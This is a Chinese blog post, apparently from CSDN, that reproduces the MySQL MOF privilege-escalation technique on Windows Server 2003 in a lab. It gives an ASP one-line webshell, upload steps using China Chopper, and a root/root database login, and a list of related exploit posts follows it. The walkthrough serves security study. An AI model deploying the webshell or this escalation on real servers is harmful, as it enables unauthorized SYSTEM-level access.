MySQL_MOF提权漏洞复现_Windows2003

已于 2024-06-23 17:48:47 修改
阅读量2.7k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 web安全 安全 网络安全
于 2021-07-23 20:43:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119041389
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Microsoft Windows server 2003

Web服务: IIS 6.0 + MySQL-5.5.22

原理

mof是Windows系统的一个文件(在c:/Windows/system32/wbem/mof/nullevt.mof),用来监控进程的创建和死亡,每隔5秒就会以system权限执行一次,攻击者将构造好的mof文件上传到指定目录下,就能执行任意命令

MOF提权的条件非常苛刻

  1. 需要Windows2008以下的版本
  2. 运行MySQL的用户必须是system
  3. 必须知道MySQL的账号和密码
  4. MySQL必须开启远程连接和文件读写功能

环境搭建

第一步,上传脚本文件到网站根目录并使用中国菜刀连接

IIS6.0的默认网站根目录是C:\Inetpub\wwwroot

<%execute(request("-7"))%>    一句话木马

使用中国菜刀连接

第二步,上传mof文件到系统的mof目录下

准备MOF文件,其作用是创建用户tom,可修改为其他任意命令

使用中国菜刀的文件管理功能,将nullevt.mof文件上传到C:\WINDOWS\Temp\目录下,Windows系统的temp目录默认有上传和执行的权限

物理机远程连接受害者的数据库,ip写受害者的ip

mysql -h 192.168.2.128 -uroot -proot

使用MySQL的文件读写功能将nullevt.mof文件从C:\WINDOWS\Temp目录移动到C:\WINDOWS\system32\wbem\mof目录下

 

网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF提权
weixin_54626591的博客
10-23 39
利用MSF对MYSQL进行简单的UDF提权
(四)mysql数据库总结和渗透测试相关漏洞整理
爱上卿的博客
01-16 2455
1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: (1)IIS PUT scanner,直接填写3306端口,IP地址填写单个或者C段地址,速度还是挺快的。 (2)nmap扫描nmap -p 3306 192.168.1.1-254 特定目标的渗透,可能需要对全端口进行扫描,可以使...
MySQL提权mof提权
2301_77300311的博客
04-11 596
关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
mysql身份认证绕过漏洞复现(CVE-2012-2122)
weixin_53730939的博客
03-12 1521
mysql身份认证绕过漏洞复现(CVE-2012-2122)
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2403
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
任意文件读取及漏洞复现
来日可期的博客
08-31 4385
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现
ran的博客
05-05 3555
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
mysql提权MOF、UDF复现
qq_25768397的博客
08-25 936
今天复现了一下mysql提权,以往都没有尝试过,所以搭建环境尝试一下。 搭建环境: phpstudy win7企业版 DVWA上传点 以上步骤省略,跳到getshell后,使用哥斯拉进行提权。(假设所有条件满足,如不满足,尝试其他方法) 一、MOF提权 原理: 利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。 注:mysql5.7 开始默认使
内网渗透之权限提升:MySQL权限提升漏洞复现
最新发布
balalawb的博客
10-17 141
UDF提权漏洞复现
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1940
第三方软件提权、Bypass UAC提权
技术干货:MySQL数据库Root权限MOF方法提权研究
weixin_34174132的博客
11-01 224
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞复现Mysql UDF提权
cj_Hydra's Blog
11-27 2061
前言: UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。 那么我们该如何使用UDF文件呢? 默认的
(新安全原创精华)Mysql扩展文件MOF提权详讲
甲方乙方
08-12 6741
哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。 希望大家可以支持我们,我们也会做得更好。无论是批评还是鼓励我们一样接受。 【MYSQL提权Mysql扩展文件MOF提权详讲 【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执行一次(由"And TargetIn
mof提权
qq115399231的博客
07-16 559
原理 利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 对windwos版本有所要求: 仅限windows server2008以下的版本 mof提权代码 #pragma namespace("\\\\.\\root\\subscription") insta...
UDF提权MOF提权
Armandhe的博客
06-05 1130
让我们来康康mysql提权的两种常见姿势!!!!!!!!!!!!!!!!
MySQL 漏洞利用与提权
weixin_50464560的博客
07-15 2588
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQL 的 UDF 提权MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
Day3——提权学习之MySQL数据库(MOF提权
0nc3的博客
12-16 518
0x00 原理 利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 0x01 利用条件 具备Mysql的root权限 0x02 提权关键 导入nullevt.mof 0x03 提权步骤 1、生成 nullevt.mof文件,上传文件到可写目录 #pragma na...
漏洞复现(CVE-2017-12615)
PDblue的博客
03-27 4431
使用https://github.com/vulhub/vulhub/搭建漏洞测试环境 搭建完成后访问http://host:8080 使用burpsuite抓包,修改数据包进行后门文件上传 上传完成后网站返回201 通过浏览器访问后门文件测试是否上传成功 后门文件成功执行命令,说明漏洞利用成功...
mysql 漏洞 安全_Mysql漏洞修复方法思路及注意事项
weixin_36467992的博客
01-18 3704
【系统环境】系统环境:RedHatEnterpriseLinuxServerrelease5.4(Tikanga)+ 5.7.16MySQLCommunityServer(GPL)【漏洞信息】漏洞信息报告,根据集团第三方软件扫描出对应数据库版本的漏洞信息,可以从DVE号跟当前数据库发布版本时间来判断是否为误报信息:【查看修复方法】一般mysql漏洞有对应的CVE号,在Ora...
mysql mof提权原理_mof提权原理及其过程
05-16
Mof文件是一种WMI(Windows Management Instrumentation)的文件格式,用于描述WMI类和实例,其中包含了一些WMI类的定义和方法,可以通过WMI来执行一些系统管理的任务。而Mof提权则是一种利用Mof文件来提升权限的攻击方式。 Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,其中包含一个“CreationClassName”属性,用于指定类的创建者。 2. 注册Mof文件到WMI中,使用“mofcomp.exe”工具将Mof文件编译成WMI可识别的格式,并使用“wmic.exe”工具将其注册到WMI中。 3. 当用户登录系统时,WMI会自动执行Mof文件中的代码,并将当前用户的权限提升为“SYSTEM”级别,从而实现提权。 需要注意的是,Mof提权需要具备本地管理员权限才能执行,因此其攻击范围相对有限。为了防止Mof提权攻击,可以使用安全软件对系统进行监控和防护,及时发现和阻止恶意Mof文件的注册和执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值